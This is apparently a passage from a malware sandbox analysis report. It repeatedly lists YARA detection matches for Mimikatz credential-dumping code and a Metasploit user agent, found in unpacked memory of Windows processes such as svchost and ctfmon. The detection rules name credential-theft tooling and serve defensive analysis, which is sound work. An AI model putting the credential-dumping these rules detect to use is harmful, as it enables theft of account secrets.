      Source: 23.0.dllhost.exe.28a2c68.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.24.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.2.ctfmon.exe.960000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.14.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 24.2.dllhost.exe.2e42c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 27.0.svchost.exe.517468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8e2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.21.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f42c68.44.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.787468.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.29.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.60.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.57b7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.792c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 30.0.WUDHostServices.exe.3e0000.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.31.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.0.ctfmon.exe.787468.4.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 0.2.wuauclt.exe.250000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 2.3.svchost.exe.4b82a68.53.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.45.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.2.svchost.exe.3079000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 29.0.svchost.exe.8d7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.26.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.0.svchost.exe.8d7468.4.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7d2c68.1.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.2.ctfmon.exe.7c7468.1.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.15.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.12.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 32.2.ctfmon.exe.787468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.2.dllhost.exe.2897468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.2.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 29.2.svchost.exe.8e2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b82a68.42.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f37468.23.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 23.0.dllhost.exe.28a2c68.5.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 21.0.SearchProtocolHost.exe.2fe2c68.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
